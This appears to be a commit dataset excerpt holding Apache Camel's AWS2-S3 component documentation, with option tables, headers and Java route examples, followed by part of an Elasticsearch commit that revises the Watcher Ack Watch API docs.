prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. 
| | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component. Use value spring or quartz for built in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. 
| true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\nRequired S3 component options\n\nYou have to provide the amazonS3Client in the\nRegistry or your accessKey and secretKey to access\nhttps:\/\/aws.amazon.com\/s3[Amazon S3].\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you, for instance, to know how many messages exist in this\nbatch and lets the Aggregator\naggregate this number of messages.\n\n== Usage\n\nFor example, in order to read file `hello.txt` from bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n=== Message headers evaluated by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3BucketName` |`String` |The bucket name in which this object will be stored, or which will be used for the current operation\n\n|`CamelAwsS3BucketDestinationName` |`String` |The destination bucket name which will be used for the current operation\n\n|`CamelAwsS3ContentLength` |`Long` |The content length of this object.\n\n|`CamelAwsS3ContentType` |`String` |The content type of this object.\n\n|`CamelAwsS3ContentControl` |`String` |The content control of this object.\n\n|`CamelAwsS3ContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelAwsS3ContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelAwsS3ContentMD5` |`String` |The MD5 checksum of this object.\n\n|`CamelAwsS3DestinationKey` |`String` |The destination key which will be used for the current operation\n\n|`CamelAwsS3Key` |`String` |The key under which this object will be stored or which will be used for the current operation\n\n|`CamelAwsS3LastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelAwsS3Operation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, listBuckets, deleteBucket, listObjects\n\n|`CamelAwsS3StorageClass` |`String` |The storage class of this object.\n\n|`CamelAwsS3CannedAcl` |`String` |The canned acl that will be applied to the object. See\n`software.amazon.awssdk.services.s3.model.ObjectCannedACL` for allowed\nvalues.\n\n|`CamelAwsS3Acl` |`software.amazon.awssdk.services.s3.model.BucketCannedACL` |A well constructed Amazon S3 Access Control List object.\nSee `software.amazon.awssdk.services.s3.model.BucketCannedACL` for more details.\n\n|`CamelAwsS3Headers` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelAwsS3ServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using AWS-managed keys.\n
For example use AES256.\n\n|`CamelAwsS3VersionId` |`String` |The version Id of the object to be stored or returned from the current operation\n|`CamelAwsS3Metadata` |`Map<String, String>` |A map of metadata stored with the object in S3.\n|=======================================================================\n\n=== Message headers set by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelAwsS3ETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelAwsS3VersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\n|=======================================================================\n\n=== Message headers set by the S3 consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3Key` |`String` |The key under which this object is stored.\n\n|`CamelAwsS3BucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelAwsS3ETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Amazon S3.\n\n|`CamelAwsS3LastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Amazon S3 last recorded a modification to the associated object.\n\n|`CamelAwsS3VersionId` |`String` |The version ID of the associated Amazon S3 object if available. Version\nIDs are only assigned to objects when an object is uploaded to an Amazon\nS3 bucket that has object versioning enabled.\n\n|`CamelAwsS3ContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelAwsS3ContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. 
This data is used as a\nmessage integrity check to verify that the data received by Amazon S3 is\nthe same data that the caller sent.\n\n|`CamelAwsS3ContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelAwsS3ContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelAwsS3ContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelAwsS3ContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelAwsS3ServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using AWS-managed keys.\n|=======================================================================\n\n=== S3 Producer operations\n\nThe Camel-AWS2-S3 component provides the following operations on the producer side:\n\n- copyObject\n- listObjects\n- deleteObject\n- deleteBucket\n- listBuckets\n- getObject (this will return an S3Object instance)\n- getObjectRange (this will return an S3Object instance)\n- createDownloadLink\n\nIf you don't specify an operation explicitly, the producer will do:\n- a single file upload\n- a multipart upload if the multiPartUpload option is enabled\n\n=== Advanced AmazonS3 configuration\n\nIf your Camel Application is running behind a firewall or if you need to\nhave more control over the `S3Client` instance configuration, you can\ncreate your own instance and refer to it in your Camel aws2-s3 component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/MyBucket?amazonS3Client=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n\n=== Use KMS with the S3 component\n\nTo use AWS KMS to encrypt\/decrypt data using AWS infrastructure, you can use the options introduced in 2.21.x, as in the following example:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"file:tmp\/test?fileName=test.txt\")\n .setHeader(AWS2S3Constants.KEY, constant(\"testFile\"))\n .to(\"aws2-s3:\/\/mybucket?amazonS3Client=#client&useAwsKMS=true&awsKMSKeyId=3f0637ad-296a-3dfe-a796-e60654fb128c\");\n--------------------------------------------------------------------------------\n\nIn this way you ask S3 to use the KMS key 3f0637ad-296a-3dfe-a796-e60654fb128c to encrypt the file test.txt. When you download this file, the decryption is done directly before the download.\n\n=== Static credentials vs Default Credential Provider\n\nYou can avoid using explicit static credentials by setting the useDefaultCredentialsProvider option to true. In that case the S3 client loads credentials through the default credentials provider chain, which looks them up in the following order:\n\n - Java system properties - aws.accessKeyId and aws.secretKey\n - Environment variables - AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.\n - Web Identity Token from AWS STS.\n - The shared credentials and config files.\n - Amazon ECS container credentials - loaded from the Amazon ECS if the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is set.\n - Amazon EC2 Instance profile credentials.\n\nFor more information, see the https:\/\/docs.aws.amazon.com\/sdk-for-java\/latest\/developer-guide\/credentials.html[AWS credentials documentation].\n\n
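For example, a consumer route that relies on the default provider chain instead of static keys could look like this (a sketch; the bucket name and region are illustrative):\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ no accessKey\/secretKey in the URI: credentials come from the default provider chain\nfrom(\"aws2-s3:\/\/mycamelbucket?useDefaultCredentialsProvider=true&region=eu-west-1\")\n    .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\n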
=== S3 Producer Operation examples\n\n- Single Upload: This operation will upload a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camel.txt\");\n exchange.getIn().setBody(\"Camel rocks!\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will upload the file camel.txt with the content \"Camel rocks!\" to the mycamelbucket bucket\n\n- Multipart Upload: This operation will perform a multipart upload of a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"empty.txt\");\n exchange.getIn().setBody(new File(\"src\/empty.txt\"));\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&multiPartUpload=true&autoCreateBucket=true&partSize=1048576\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will perform a multipart upload of the file empty.txt, based on the content of the file src\/empty.txt, to the mycamelbucket bucket\n\n- CopyObject: this operation copies an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.BUCKET_DESTINATION_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(AWS2S3Constants.DESTINATION_KEY, \"camelDestinationKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object camelKey from the bucket mycamelbucket to the camelDestinationBucket bucket, storing it under the key expressed in the header camelDestinationKey.\n\n
- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation lists the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account\n\n- DeleteBucket: this operation deletes the bucket specified as URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket\n\n- ListObjects: this operation lists the objects in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket\n\n- GetObject: this operation gets a single object from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in the mycamelbucket bucket.\n\n- GetObjectRange: this operation gets a single object range from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(AWS2S3Constants.RANGE_START, \"0\");\n exchange.getIn().setHeader(AWS2S3Constants.RANGE_END, \"9\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in the mycamelbucket bucket, containing the bytes from 0 to 9.\n\n
- CreateDownloadLink: this operation will return a download link through the S3 Presigner\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?accessKey=xxx&secretKey=yyy&region=region&operation=createDownloadLink\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a download link url for the file camelKey in the bucket mycamelbucket and region region\n\n== Streaming Upload mode\n\nWith the stream mode enabled, users will be able to upload data to S3 without knowing ahead of time the dimension of the data, by leveraging multipart upload.\nThe upload is completed when either the batchSize or the batchMessageNumber has been reached.\nThere are two possible naming strategies: progressive and random. With the progressive strategy each file will have a name composed of the keyName option, a progressive counter and, if present, the file extension, while with the random strategy a UUID will be added after the keyName and the file extension, if present, will be appended.\n\nAs an example:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(kafka(\"topic1\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic1}}\/{{kafkaTopic1}}.txt\"));\n\nfrom(kafka(\"topic2\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic2}}\/{{kafkaTopic2}}.txt\"));\n--------------------------------------------------------------------------------\n\nThe default size for a batch is 1 Mb, but you can adjust it according to your requirements.\n\nWhen you stop your producer route, the producer will take care of flushing the remaining buffered messages and complete the upload.\n\nIn streaming upload mode you'll be able to restart the producer from the point where it left off. It's important to note that this matters only when using the progressive naming strategy.\n\nBy setting the restartingPolicy to lastPart, you will restart uploading files and contents from the last part number the producer left.\n\nAs an example:\n- Start the route with the progressive naming strategy and keyName equal to camel.txt, with batchMessageNumber equal to 20, and restartingPolicy equal to lastPart\n- Send 70 messages.\n- Stop the route\n- On your S3 bucket you should now see 4 files: camel.txt, camel-1.txt, camel-2.txt and camel-3.txt; the first three will have 20 messages, while the last one only 10.\n- Restart the route\n- Send 25 messages\n- Stop the route\n- You'll now have 2 other files in your bucket: camel-5.txt and camel-6.txt, the first with 20 messages and the second with 5 messages.\n- And so on\n\nThis won't be needed when using the random naming strategy.\n\nAlternatively, you can specify the override restartingPolicy, as in the following sketch.\n\n
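A minimal sketch, assuming the same Kafka source as in the earlier streaming example (the broker address, batch size and key name are illustrative):\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(kafka(\"topic1\").brokers(\"localhost:9092\"))\n    .to(aws2S3(\"camel-bucket\")\n        .streamingUploadMode(true)\n        .batchMessageNumber(20)\n        \/\/ on restart, overwrite whatever was previously uploaded for this keyName\n        .restartingPolicy(AWS2S3EndpointBuilderFactory.AWSS3RestartingPolicyEnum.override)\n        .keyName(\"{{kafkaTopic1}}\/{{kafkaTopic1}}.txt\"));\n--------------------------------------------------------------------------------\n\n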
In that case you'll be able to override whatever you wrote before (for that particular keyName) in your bucket.\n\n[NOTE]\n====\nIn streaming upload mode the only keyName setting that will be taken into account is the endpoint option. Using the header will throw an NPE and this is done by design.\nSetting the header would mean potentially changing the file name on each exchange, and this is against the aim of the streaming upload producer. The keyName needs to be fixed and static.\nThe selected naming strategy will do the rest of the work.\n====\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users can control the autocreation of the S3 bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false, any operation on a non-existent bucket in AWS won't be successful and an error will be returned.\n\n== Moving objects between buckets\n\nSome users like to consume objects from one bucket and move them to a different bucket without using the copyObject feature of this component.\nIf this is the case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer; otherwise the file will always be overwritten in the same\noriginal bucket.\n\n
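A minimal sketch of such a route (assuming the client is bound in the registry as amazonS3Client; bucket names are illustrative). Removing the bucket name header lets the producer fall back to the bucket configured on its own endpoint:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client\")\n    \/\/ drop the consumer-set bucket header so the producer writes to its endpoint bucket\n    .removeHeader(AWS2S3Constants.BUCKET_NAME)\n    .to(\"aws2-s3:\/\/myothercamelbucket?amazonS3Client=#amazonS3Client\");\n--------------------------------------------------------------------------------\n\n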
== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead, another option has been added: moveAfterRead. With this option enabled the consumed object will be moved to a target destinationBucket instead of being only deleted.\nThis will require specifying the destinationBucket option. For example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to the myothercamelbucket bucket and deleted from the original one (because deleteAfterRead is set to true by default).\n\nYou also have the possibility of using a key prefix\/suffix while moving the file to a different bucket. The options are destinationBucketPrefix and destinationBucketSuffix.\n\nTaking the above example, you could do something like:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket&destinationBucketPrefix=RAW(pre-)&destinationBucketSuffix=RAW(-suff)\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to the myothercamelbucket bucket and deleted from the original one (because deleteAfterRead is set to true by default).\n\nSo if the file name is test, in myothercamelbucket you should see a file called pre-test-suff.\n\n== Using customer key as encryption\n\nWe also introduced customer key support (an alternative to using KMS). The following code shows an example.\n\n[source,java]\n--------------------------------------------------------------------------------\nString key = UUID.randomUUID().toString();\nbyte[] secretKey = generateSecretKey();\nString b64Key = Base64.getEncoder().encodeToString(secretKey);\nString b64KeyMd5 = Md5Utils.md5AsBase64(secretKey);\n\nString awsEndpoint = \"aws2-s3:\/\/mycamel?autoCreateBucket=false&useCustomerKey=true&customerKeyId=RAW(\" + b64Key + \")&customerKeyMD5=RAW(\" + b64KeyMd5 + \")&customerAlgorithm=\" + AES256.name();\n\nfrom(\"direct:putObject\")\n .setHeader(AWS2S3Constants.KEY, constant(\"test.txt\"))\n .setBody(constant(\"Test\"))\n .to(awsEndpoint);\n--------------------------------------------------------------------------------\n\n== Using a POJO as body\n\nSometimes building an AWS request can be complex because of multiple options. We introduce the possibility to use a POJO as the body.\nIn AWS S3 there are multiple operations you can submit; for example, for a ListObjects request, you can do something like:\n\n[source,java]\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:aws2-s3\")\n .setBody(ListObjectsRequest.builder().bucket(bucketName).build())\n .to(\"aws2-s3:\/\/test?amazonS3Client=#amazonS3Client&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly, without the need to pass headers and options specifically related to this operation.\n\n== Create S3 client and add component to registry\nSometimes you may want to perform some advanced configuration using AWS2S3Configuration, which also allows you to set the S3 client.\nYou can create and set the S3 client in the component configuration as shown in the following example:\n\n[source,java]\n--------------------------------------------------------------------------------\nString awsBucketAccessKey = \"your_access_key\";\nString awsBucketSecretKey = \"your_secret_key\";\n\nS3Client s3Client = S3Client.builder().credentialsProvider(StaticCredentialsProvider.create(AwsBasicCredentials.create(awsBucketAccessKey, awsBucketSecretKey)))\n .region(Region.US_EAST_1).build();\n\nAWS2S3Configuration configuration = new AWS2S3Configuration();\nconfiguration.setAmazonS3Client(s3Client);\nconfiguration.setAutoDiscoverClient(true);\nconfiguration.setBucketName(\"s3bucket2020\");\nconfiguration.setRegion(\"us-east-1\");\n--------------------------------------------------------------------------------\n\nNow you can configure the S3 component (using the configuration object created above) and add it to the registry in the\nconfigure method before initialization of routes.\n\n[source,java]\n--------------------------------------------------------------------------------\nAWS2S3Component s3Component = new AWS2S3Component(getContext());\ns3Component.setConfiguration(configuration);\ns3Component.setLazyStartProducer(true);\ncamelContext.addComponent(\"aws2-s3\", s3Component);\n--------------------------------------------------------------------------------\n\nNow your component will be used for all the operations implemented in camel routes.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-s3<\/artifactId>\n
<version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\n\ninclude::{page-component-version}@camel-spring-boot::page$aws2-s3-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c2188a175941b4b6b740c107cafa90cafb0e6c7","subject":"Reduce chance for test failure due to schedule (#56633)","message":"Reduce chance for test failure due to schedule (#56633)\n\nIf CI is running tests at exactly 0 or 5 minutes past the hour\r\nthe ack-watch docs tests may fail with a 409 error if the ack\r\ntest happens to run at the exact time that the schedule watch\r\nis running.\r\n\r\nThis commit changes the public documentation (and the test) for\r\nthe ack to a feb 29th at noon schedule. Test doc or tests do\r\nnot really care about the schedule date and this is chosen\r\nsince it is a valid date, but one that is extremely unlikely\r\nto cause issues.","repos":"robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch","old_file":"x-pack\/docs\/en\/rest-api\/watcher\/ack-watch.asciidoc","new_file":"x-pack\/docs\/en\/rest-api\/watcher\/ack-watch.asciidoc","new_contents":"[role=\"xpack\"]\n[[watcher-api-ack-watch]]\n=== Ack watch API\n++++\n<titleabbrev>Ack watch<\/titleabbrev>\n++++\n\n<<actions-ack-throttle,Acknowledging a watch>> enables you\nto manually throttle execution of the watch's actions.\n\n[[watcher-api-ack-watch-request]]\n==== {api-request-title}\n\n`PUT _watcher\/watch\/<watch_id>\/_ack` +\n\n`PUT _watcher\/watch\/<watch_id>\/_ack\/<action_id>`\n\n[[watcher-api-ack-watch-prereqs]]\n==== {api-prereq-title}\n\n* You must have `manage_watcher` cluster privileges to use this API. For more\ninformation, see <<security-privileges>>.\n\n[[watcher-api-ack-watch-desc]]\n==== {api-description-title}\n\nAn action's _acknowledgement state_ is stored in the\n`status.actions.<id>.ack.state` structure.\n\nIMPORTANT: If the specified watch is currently being executed, this API will\nreturn an error. The reason for this is to prevent overwriting of the watch\nstatus from a watch execution.\n\n[[watcher-api-ack-watch-path-params]]\n==== {api-path-parms-title}\n\n`<action_id>`::\n (Optional, list) A comma-separated list of the action IDs to acknowledge. 
If you omit\n this parameter, all of the actions of the watch are acknowledged.\n\n`<watch_id>`::\n (Required, string) Identifier for the watch.\n\n\/\/[[watcher-api-ack-watch-query-params]]\n\/\/==== {api-query-parms-title}\n\n\/\/[[watcher-api-ack-watch-request-body]]\n\/\/==== {api-request-body-title}\n\n\/\/[[watcher-api-ack-watch-response-body]]\n\/\/==== {api-response-body-title}\n\n\/\/[[watcher-api-ack-watch-response-codes]]\n\/\/==== {api-response-codes-title}\n\n[[watcher-api-ack-watch-example]]\n==== {api-examples-title}\n\nTo demonstrate let's create a new watch:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\n{\n \"trigger\" : {\n \"schedule\" : {\n \"yearly\" : { \"in\" : \"february\", \"on\" : 29, \"at\" : \"noon\" }\n }\n },\n \"input\": {\n \"simple\": {\n \"payload\": {\n \"send\": \"yes\"\n }\n }\n },\n \"condition\": {\n \"always\": {}\n },\n \"actions\": {\n \"test_index\": {\n \"throttle_period\": \"15m\",\n \"index\": {\n \"index\": \"test\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTSETUP\n\nThe current status of a watch and the state of its actions is returned with the\nwatch definition when you call the <<watcher-api-get-watch, Get Watch API>>:\n\n[source,console]\n--------------------------------------------------\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\nThe action state of a newly-created watch is `awaits_successful_execution`:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_seq_no\": 0,\n \"_primary_term\": 1,\n \"_version\": 1,\n \"_id\": \"my_watch\",\n \"status\": {\n \"version\": 1,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"awaits_successful_execution\"\n }\n }\n },\n \"state\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\nWhen the watch executes and the condition matches, the value of the `ack.state`\nchanges to `ackable`. 
